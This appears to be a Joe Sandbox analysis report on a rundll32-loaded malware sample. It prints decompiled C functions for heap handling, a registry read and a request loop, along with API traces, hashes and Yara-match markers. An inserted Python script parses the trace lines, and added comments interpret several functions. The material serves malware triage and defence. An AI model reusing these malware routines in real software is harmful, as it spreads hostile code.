                                					_t8 = 8;
                                					return _t8;
                                				}
                                				 *0x343a1c8 = GetTickCount();
                                				_t5 = E03436D78(_a4);
                                				if(_t5 == 0) {
                                					_t5 = E03434B89(_t9, _a4); // executed
                                					if(_t5 == 0) {
                                						if(E03436B1C(_t9) != 0) {
                                							 *0x343a300 = 1; // executed
                                						}
                                						_t7 = E03433D2C(_t10); // executed
                                						return _t7;
                                					}
                                				}
                                				return _t5;
                                			}

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,03435E54,?), ref: 03431CDF
                                • GetTickCount.KERNEL32 ref: 03431CF3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
• Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CountCreateHeapTick
                                • String ID:
                                • API String ID: 2177101570-0
                                • Opcode ID: 1c6ef428e0cf35841068d6d3cdef35a160d02f097a10326f084c5f6bd9872785
                                • Instruction ID: 31787dd8e4c18fe31312426c71ce780e5d2b50df1906df30f88ab900d5eef2f3
                                • Opcode Fuzzy Hash: 1c6ef428e0cf35841068d6d3cdef35a160d02f097a10326f084c5f6bd9872785
                                • Instruction Fuzzy Hash: ABF06574240302AAEB10FB71AD4576A35E46B0F740F14482BE981EF284DBB5D0009A1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 034855E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0348561D
                                  • Part of subcall function 034855E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 03485653
                                  • Part of subcall function 034855E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0348565F
                                  • Part of subcall function 034855E4: lstrcmpi.KERNEL32(?,00000000), ref: 0348569C
                                  • Part of subcall function 034855E4: StrChrA.SHLWAPI(?,0000002E), ref: 034856A5
                                  • Part of subcall function 034855E4: lstrcmpi.KERNEL32(?,00000000), ref: 034856B7
                                  • Part of subcall function 034855E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03485708
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,034960E0,0000002C,034890D3,06168E36,?,00000000,0348A484), ref: 03491E2C
                                  • Part of subcall function 0348A806: GetProcAddress.KERNEL32(?,00000000), ref: 0348A82F
                                  • Part of subcall function 0348A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03486230,00000000,00000000,00000028,00000100), ref: 0348A851
                                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,034960E0,0000002C,034890D3,06168E36,?,00000000,0348A484,?,00000318), ref: 03491EB7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                • String ID:
                                • API String ID: 4138075514-0
                                • Opcode ID: 761b6edb2596c110d5560c08e5410a01477b9dd30d3202bc05d085ce14ab6072
                                • Instruction ID: 625a179b33ef61e23ca5f201163615b4a2b8085fa41cacd44807edaad6f3f788
                                • Opcode Fuzzy Hash: 761b6edb2596c110d5560c08e5410a01477b9dd30d3202bc05d085ce14ab6072
                                • Instruction Fuzzy Hash: 8E21D075D01229EFDF11DFA6D884ADEBFB5BF09720F15812BE914BA250C3344A418FA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,03490977,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034918D5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: d1e704bbd7a69b0790425a9c23ff103fc134ab082fc8f8b539aeef2683e7bfdf
                                • Instruction ID: ee26399b4bca0683c9ba261380920f31f6c58970da2e490ae4993595c7b2853c
                                • Opcode Fuzzy Hash: d1e704bbd7a69b0790425a9c23ff103fc134ab082fc8f8b539aeef2683e7bfdf
                                • Instruction Fuzzy Hash: 16318575A40206EFEF01EF99D4859AEBBF9FB45210F5844ABD205AF304C730A941CF99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 92%
                                			E03431C03(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                				signed int _v5;
                                				signed int _v12;
                                				void* _t32;
                                				signed int _t37;
                                				signed int _t39;
                                				signed char _t45;
                                				void* _t49;
                                				char* _t51;
                                				signed int _t65;
                                				signed int _t66;
                                				signed int _t69;
                                
                                				_v12 = _v12 & 0x00000000;
                                				_t69 = __eax;
                                				_t32 = RtlAllocateHeap( *0x343a2d8, 0, __eax << 2); // executed
                                				_t49 = _t32;
                                				if(_t49 == 0) {
                                					_v12 = 8;
                                				} else {
                                					 *_a8 = _t49;
                                					do {
                                						_t45 =  *_a4;
                                						asm("cdq");
                                						_t65 = 0x64;
                                						_t37 = (_t45 & 0x000000ff) / _t65;
                                						_v5 = _t37;
                                						if(_t37 != 0) {
                                							 *_t49 = _t37 + 0x30;
                                							_t49 = _t49 + 1;
                                							_t45 = _t45 + _t37 * 0x9c;
                                						}
                                						asm("cdq");
                                						_t66 = 0xa;
                                						_t39 = (_t45 & 0x000000ff) / _t66;
                                						if(_t39 != 0 || _v5 != _t39) {
                                							 *_t49 = _t39 + 0x30;
                                							_t49 = _t49 + 1;
                                							_t45 = _t45 + _t39 * 0xf6;
                                						}
                                						_a4 = _a4 + 1;
                                						 *_t49 = _t45 + 0x30;
                                						 *(_t49 + 1) = 0x2c;
                                						_t49 = _t49 + 2;
                                						_t69 = _t69 - 1;
                                					} while (_t69 != 0);
                                					_t51 = _t49 - 1;
                                					 *_a12 = _t51 -  *_a8;
                                					 *_t51 = 0;
                                				}
                                				return _v12;
                                			}

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 03431C1B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
• Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: e5ef01e883eba7cb3d281ac79740f7e406c3b619802b519a7e2fa895b0da9e2f
                                • Instruction ID: a00b61df4224028d0a9ca441d353fff7bb956b0dd3e37a89296afc0c425287d0
                                • Opcode Fuzzy Hash: e5ef01e883eba7cb3d281ac79740f7e406c3b619802b519a7e2fa895b0da9e2f
                                • Instruction Fuzzy Hash: B811D631285344AFEB159F29D896BE9BBA9DB57358F18408BE4409F392C277850BC724
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(?,034999DC,-0000000C,?,?,?,0348C01A,00000006,?,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 03474ADA
                                  • Part of subcall function 034774AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0349A400), ref: 034774C5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HandleInformationModuleProcessQuery
                                • String ID:
                                • API String ID: 2776635927-0
                                • Opcode ID: b3ac84fd2310d04eec244bd271d085b98d1e6e5da146ea67d5863ad9dc058efd
                                • Instruction ID: 59b670fcddd6e447a3c8a72b75e0a60eb21f703c335a44f2e99a6d7031997e35
                                • Opcode Fuzzy Hash: b3ac84fd2310d04eec244bd271d085b98d1e6e5da146ea67d5863ad9dc058efd
                                • Instruction Fuzzy Hash: A7218135600205AFDB21DF5BC494ABBB7E9EF48394768452FE9458F350D670ED01CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0343375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                				intOrPtr _v12;
                                				signed int _v20;
                                				intOrPtr _v24;
                                				signed int _v60;
                                				char _v68;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				intOrPtr _t14;
                                				signed int* _t16;
                                				signed int _t25;
                                				signed int _t26;
                                				signed int* _t28;
                                				signed int _t30;
                                
                                				_t28 = __ecx;
                                				_t14 =  *0x343a368; // 0x55e9618
                                				_v12 = _t14;
                                				_t16 = _a12;
                                				_t30 = 8;
                                				if(_t16 != 0) {
                                					 *_t16 =  *_t16 & 0x00000000;
                                				}
                                				do {
                                					_t31 =  &_v68;
                                					if(E0343227F( &_v68) == 0) {
                                						goto L16;
                                					}
                                					_t30 = E03436954(_t31, _a4, _v12);
                                					if(_t30 == 0) {
                                						_t25 = E03431CA5(_t31, _t28); // executed
                                						_t30 = _t25;
                                						if(_t30 != 0) {
                                							if(_t30 == 0x102) {
                                								E0343A000 = E0343A000 + 0xea60;
                                							}
                                						} else {
                                							if(_v24 != 0xc8) {
                                								_t30 = 0xe8;
                                							} else {
                                								_t26 = _v20;
                                								if(_t26 == 0) {
                                									_t30 = 0x10d2;
                                								} else {
                                									_t28 = _a8;
                                									if(_t28 != 0) {
                                										_v60 = _v60 & _t30;
                                										 *_t28 = _v60;
                                										_t28 = _a12;
                                										if(_t28 != 0) {
                                											 *_t28 = _t26;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                					E03434274( &_v68, 0x102, _t28, _t30);
                                					L16:
                                				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x343a30c, 0) == 0x102);
                                				return _t30;
                                			}

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,76CC81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03433811
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
• Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 94a698a9a8576dc17ca1dd5cec89bbeacbfaec84778af4a445038ea9170e9c22
                                • Instruction ID: 28ace0b982531363573422712bcece9d46fb46d3ea14755a481bcccbc5eacb0d
                                • Opcode Fuzzy Hash: 94a698a9a8576dc17ca1dd5cec89bbeacbfaec84778af4a445038ea9170e9c22
                                • Instruction Fuzzy Hash: 76218CBE7002459BDF11DE5AD881AAEB7B5BB8A350F18802BE511AF340DB70D841CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
			E03431B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;		// VARIANT data field (offset +8 from _v20): the returned BSTR
				void* _v18;
				char _v20;			// VARIANT vt field (offset +0)
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;			// zero the 16-byte VARIANT-sized local at &_v20 (VariantInit equivalent)
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x343a348; // 0x21ad5a8
				_t4 = _t15 + 0x343b3a0; // 0x55e8948
				_t20 = _t4;
				_t6 = _t15 + 0x343b124; // 0x650047
				// 0x80000002 == HKEY_LOCAL_MACHINE; E034346CB returns an HRESULT-style status and fills the VARIANT at &_v20
				_t17 = E034346CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;	// propagate the failing status
				} else {
					_t23 = 8;		// VT_BSTR
					if(_v20 != _t23) {
						_t23 = 1;	// a value came back but it is not a string: fail
					} else {
						_t19 = E034359AE(_t20, _v12);	// copy the wide string out (lstrlenW/memcpy/memset, see APIs below)
						if(_t19 != 0) {
							 *_a16 = _t19;		// caller receives the copy
							_t23 = 0;
						}
						__imp__#6(_v12);		// OLEAUT32 ordinal 6 == SysFreeString (ref 03431BD2 in the APIs list)
					}
				}
				return _t23;
			}


                                APIs
                                  • Part of subcall function 034346CB: SysFreeString.OLEAUT32(?), ref: 034347AA
                                  • Part of subcall function 034359AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,03435EFA,004F0053,00000000,?), ref: 034359B7
                                  • Part of subcall function 034359AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,03435EFA,004F0053,00000000,?), ref: 034359E1
                                  • Part of subcall function 034359AE: memset.NTDLL ref: 034359F5
                                • SysFreeString.OLEAUT32(00000000), ref: 03431BD2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: a1ee41c12b48da6c87937dac47cc7ff2746270ad47359fbecc8010aecd480f89
                                • Instruction ID: 4d60af80ab422aa7ac32938b74b9f79d9480cb83c70e30d0754c8636ae3965a8
                                • Opcode Fuzzy Hash: a1ee41c12b48da6c87937dac47cc7ff2746270ad47359fbecc8010aecd480f89
                                • Instruction Fuzzy Hash: 85017C36500129BFDF11EFA9DC01EABBBB9FB09750F00056AE905EF160E3709922C7A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 89%
			E03432E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;	// ERROR_INVALID_PARAMETER: no input buffer or zero length
				} else {
					// E03431C03 produces a heap buffer from the input (RtlAllocateHeap, see APIs below);
					// &_a4 is overwritten with that buffer and _v8 receives its length
					_t14 = E03431C03(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x343a348; // 0x21ad5a8
						_t9 = _t17 + 0x343ba40; // 0x444f4340
						// E03433B58 scans the buffer (lstrlen/StrStrA) and writes its results through __esi + 8 and __esi + 0xc
						_t20 = E03433B58( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x343a2d8, 0, _a4); // executed; *0x343a2d8 is the heap handle shared by this module's heap wrappers
					}
				}
				return _t26;	// 0 on success, otherwise an error code (0x57 for bad arguments)
			}


                                APIs
                                  • Part of subcall function 03431C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 03431C1B
                                  • Part of subcall function 03433B58: lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 03433B8C
                                  • Part of subcall function 03433B58: StrStrA.SHLWAPI(00000000,?), ref: 03433B99
                                  • Part of subcall function 03433B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 03433BB8
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,0343553D), ref: 03432EA4
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Allocate$Freelstrlen
                                • String ID:
                                • API String ID: 2220322926-0
                                • Opcode ID: 640bf547a870da43b870aedba15770973e96ddcdde2fe66be871cc879d35a1fe
                                • Instruction ID: e4e1d8b834478ef8e5fe3a3669a576c62f762dd17acfa80d68259cb60a1a15ee
                                • Opcode Fuzzy Hash: 640bf547a870da43b870aedba15770973e96ddcdde2fe66be871cc879d35a1fe
                                • Instruction Fuzzy Hash: 8A01813A100608FFDB11DF44CC02FAA7BF9EB49250F14402AFA559F264E7B1EA55DB54
                                Uniqueness

                                Uniqueness Score: -1.00%
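Each function block in this report lists its API calls in one textual form: a bullet, an optional "Part of subcall function XXXXXXXX:" prefix for calls reached indirectly, then Name.MODULE(args) and the "ref:" address of the call site. The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it parses such lines into records and summarizes direct versus indirect calls per function and per module, which is the first thing a triager wants when walking a report of this size. The sample lines are copied from the blocks in this section; the regular expression is an assumption about the line grammar inferred from those lines, not a documented format.

```python
import re
from collections import Counter

# Sample input: API trace lines copied from the function blocks in this
# section of the report (bullet, optional "Part of subcall function" prefix,
# Name.MODULE(args) and the "ref:" call-site address).
SAMPLE = """\
• Part of subcall function 034346CB: SysFreeString.OLEAUT32(?), ref: 034347AA
• Part of subcall function 034359AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,03435EFA,004F0053,00000000,?), ref: 034359B7
• Part of subcall function 034359AE: memset.NTDLL ref: 034359F5
• SysFreeString.OLEAUT32(00000000), ref: 03431BD2
• RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,0343553D), ref: 03432EA4
• ___delayLoadHelper2@8.DELAYIMP ref: 03493090
• Part of subcall function 0348AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,034763CD,00000000,00000001,-00000007,?,00000000), ref: 0348AFA6
"""

# Assumed line grammar, inferred from the lines above (not a documented Joe Sandbox format).
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<via>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_@#]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def _arg(token):
    """'?' marks a value the sandbox could not resolve; everything else is hex (possibly negative)."""
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token  # keep anything unexpected verbatim rather than dropping it


def parse_api_line(line):
    """Return one call record, or None for lines that are not API trace lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw_args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "ref": int(m.group("ref"), 16),
        "via": int(m.group("via"), 16) if m.group("via") else None,
        "args": [] if not raw_args else [_arg(a) for a in raw_args.split(",")],
    }


def parse_trace(text):
    """Parse every API trace line in a block of report text, skipping everything else."""
    return [r for r in (parse_api_line(ln) for ln in text.splitlines()) if r]


def summarize(records):
    """Direct calls, indirect calls grouped by the subcall that reaches them, and per-module counts."""
    direct = [r for r in records if r["via"] is None]
    indirect = {}
    for r in records:
        if r["via"] is not None:
            indirect.setdefault(r["via"], []).append(r)
    return {
        "direct": direct,
        "indirect": indirect,
        "by_module": Counter(r["module"] for r in records),
        "apis": sorted({r["api"] for r in records}),
    }


if __name__ == "__main__":
    recs = parse_trace(SAMPLE)
    s = summarize(recs)
    for r in s["direct"]:
        print(f"{r['ref']:08X} {r['api']}.{r['module']} args={r['args']}")
    for via, calls in s["indirect"].items():
        print(f"via {via:08X}: " + ", ".join(f"{c['api']}@{c['ref']:08X}" for c in calls))
    print(dict(s["by_module"]))
```

Unresolved arguments are kept as None rather than dropped, so positional checks (for example, the fourth RtlFreeHeap argument 0x444F4340 above) still line up with the report; the "via" field lets you see that SysFreeString is reached both directly at 03431BD2 and through E034346CB.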

                                APIs
                                  • Part of subcall function 034771B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0349A170,00000000,03485D81,?,0347F2F7,?), ref: 034771D3
                                  • Part of subcall function 034771B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0349A170,00000000,03485D81,?,0347F2F7,?), ref: 034771DE
                                  • Part of subcall function 034771B4: _wcsupr.NTDLL ref: 034771EB
                                  • Part of subcall function 034771B4: lstrlenW.KERNEL32(00000000), ref: 034771F3
                                • ResumeThread.KERNEL32(00000004,?,0347F2F7,?), ref: 03485D8F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                • String ID:
                                • API String ID: 3646851950-0
                                • Opcode ID: 1972fcab9162442a4fa7f1ff7c680bdd6ba11be2a57c404d1c96cd543772d13d
                                • Instruction ID: 5b18d1cb33506a292e7f806065f61714c241314333f02dc360103d055a1efc76
                                • Opcode Fuzzy Hash: 1972fcab9162442a4fa7f1ff7c680bdd6ba11be2a57c404d1c96cd543772d13d
                                • Instruction Fuzzy Hash: A1D05E3C204311AEEA22B711CD09B1F7DD29F82B48F14C4EBED859C261C3728890964C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 03493090
                                  • Part of subcall function 034931E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,03470000), ref: 0349325C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                • String ID:
                                • API String ID: 123106877-0
                                • Opcode ID: f6e32abacc6f27ae7466b71884c82d9aeae5744dd16fe67d761ce1e0a513a93f
                                • Instruction ID: 7808d85cc7c2ef4d74871a5c3345215beb3f951c6ce1f2a7fbd00f6de7508cee
                                • Opcode Fuzzy Hash: f6e32abacc6f27ae7466b71884c82d9aeae5744dd16fe67d761ce1e0a513a93f
                                • Instruction Fuzzy Hash: EFA0029D1D56017D7914D5515D47C3B1F1CC4D1921332891FF4619C05559471D450079
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 03493090
                                  • Part of subcall function 034931E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,03470000), ref: 0349325C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                • String ID:
                                • API String ID: 123106877-0
                                • Opcode ID: 10d3859e5a96bf6075d54c8e9be992c2bae0b125d086eb25ae4e667799500661
                                • Instruction ID: f7c6fc166d4bc7fcc972ab125c353268c44395acb236103c2c875c9ae72ee93c
                                • Opcode Fuzzy Hash: 10d3859e5a96bf6075d54c8e9be992c2bae0b125d086eb25ae4e667799500661
                                • Instruction Fuzzy Hash: A7A0019E2A9202BD7918EA526D4BC3B1F1CC4C6A613328D2FE4628C055AA871E8A0079
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 5db0048ba594203df91605a809d0992ef5bf46571ef1c8f58cdf10a2420c2ed8
                                • Instruction ID: 04f3af140f96b293593a87990dacf25516ee6d0544f4ab484c00daddd07cf046
                                • Opcode Fuzzy Hash: 5db0048ba594203df91605a809d0992ef5bf46571ef1c8f58cdf10a2420c2ed8
                                • Instruction Fuzzy Hash: 08B01271100100ABCA026F01DE05F057BA1A771700F124012B3086C06882310424FB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: e57246f125677fca0120ffbdd35deef28e47a2777dd278f759505b19f49e4d1a
                                • Instruction ID: 05e222da5178459062f16365f3d03327750d6587652a68d68a6341c5d545ff4e
                                • Opcode Fuzzy Hash: e57246f125677fca0120ffbdd35deef28e47a2777dd278f759505b19f49e4d1a
                                • Instruction Fuzzy Hash: F4B01231000100ABCA026F00DD06F057BA1AB71700F124412B208A806882310468FB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
			E03436D63(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x343a2d8, 0, _a4); // executed; *0x343a2d8 is the module's heap handle (same handle as E03436C2C and the RtlFreeHeap in E03432E4E)
				return _t2;
			}


                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: e85ccf055c417962784c9dd16d773ffa0cf7aac32a55a169b64ee40450474aee
                                • Instruction ID: bdedb9f06dc8c814aad73cbef87a1bfe099c36bd30067d64e159f5f5da10708d
                                • Opcode Fuzzy Hash: e85ccf055c417962784c9dd16d773ffa0cf7aac32a55a169b64ee40450474aee
                                • Instruction Fuzzy Hash: 0BB01231044200BBCA016B00DD08F457BB1B750700F004010B644A91F883730470FB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
			E03436C2C(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x343a2d8, 0, _a4); // executed; releases a buffer obtained from E03436D63 on the same heap handle
				return _t2;
			}


                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
